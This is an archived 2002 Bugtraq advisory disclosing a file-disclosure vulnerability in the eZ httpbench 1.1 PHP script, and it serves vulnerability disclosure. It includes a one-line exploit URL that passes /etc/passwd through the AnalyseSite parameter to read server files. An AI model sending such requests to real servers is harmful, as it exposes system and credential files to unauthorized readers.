[27809] in bugtraq
benchmark tool for HTTP pages.
daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Mon Nov 11 11:29:32 2002
Message-ID: <20021110170923.83216.qmail@web21305.mail.yahoo.com>
Date: Sun, 10 Nov 2002 09:09:23 -0800 (PST)
From: Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
ezhttpbench.php
eZ httpbench version 1.1(http://developer.ez.no) -
benchmark tool for HTTP pages.
A security vulnerability in the product allows remote
attackers to download any file
on the local system that the eZ httpbench has read
access to.
Vulnerable systems:
eZ httpbench version 1.1
eZ httpbench php script allows remote visitors to view
any file on a webserver.
Exploit:
http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
This will display the /etc/passwd (if the webserver
user has access to this file).
__________________________________________________
Do you Yahoo!?
U2 on LAUNCH - Exclusive greatest hits videos
http://launch.yahoo.com/u2
